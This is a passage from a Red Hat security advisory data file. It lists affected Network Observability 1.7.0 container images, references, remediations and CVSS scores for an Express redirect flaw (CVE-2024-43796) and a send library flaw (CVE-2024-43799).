"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", 